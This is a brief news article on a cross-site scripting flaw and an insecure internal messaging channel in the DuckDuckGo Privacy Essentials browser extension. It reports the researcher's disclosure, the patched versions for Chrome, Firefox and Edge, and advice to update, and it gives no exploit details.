The privacy-focused service DuckDuckGo has recently addressed a serious vulnerability affecting its browser extension DuckDuckGo Privacy Essentials. Exploiting this vulnerability could allow an adversary to execute arbitrary codes on any domain.
DuckDuckGo Browser Extension Vulnerability
Security researcher Wladimir Palant found serious security issues affecting the DuckDuckGo browser add-on.
Explaining the details in his post, Palant mentioned two distinct issues with the extension DuckDuckGo Privacy Essentials.
One of these is a cross-site scripting (XSS) vulnerability affecting all major versions of DuckDuckGo browser extension. Anyone with control on the http://staticcdn.duckduckgo.com could exploit the flaw. This includes the service itself, that is, DuckDuckGo, the hosting provider (Microsoft), or even an adversary who manages to gain access to the server.
Secondly, he found the extension using insecure channels for internal communication that leaks some data across domains.
Technical details about these issues are available in the researcher’s post.
Patches Now Available
Upon discovering the vulnerabilities, the researcher reported the matter to DuckDuckGo.
Consequently, the service worked out on the fixes to address these issues. They then started rolling out the updates gradually.
At first, DuckDuckGo released the Privacy Essentials extension version 2021.2.3 for Google Chrome. Later on, they released the patches for the extension versions for Mozilla Firefox and Microsoft Edge as well.
Hence, the users running the latest version of DuckDuckGo Privacy Essentials (v 2021.3.8) are seemingly safe from any issues potentially arising from these bugs. Whereas those who are still using the older version should ensure updating their browsers with the latest add-on version.
DuckDuckGo Privacy Essentials is a dedicated browser extension available for all major browsers such as Mozilla Firefox, Google Chrome, Microsoft Edge, and others. It’s an open-source extension that protects the users from web trackers while browsing, enforces HTTPS-only browsing, and enhances security without intrusive data collection at its end.
Let us know your thoughts in the comments.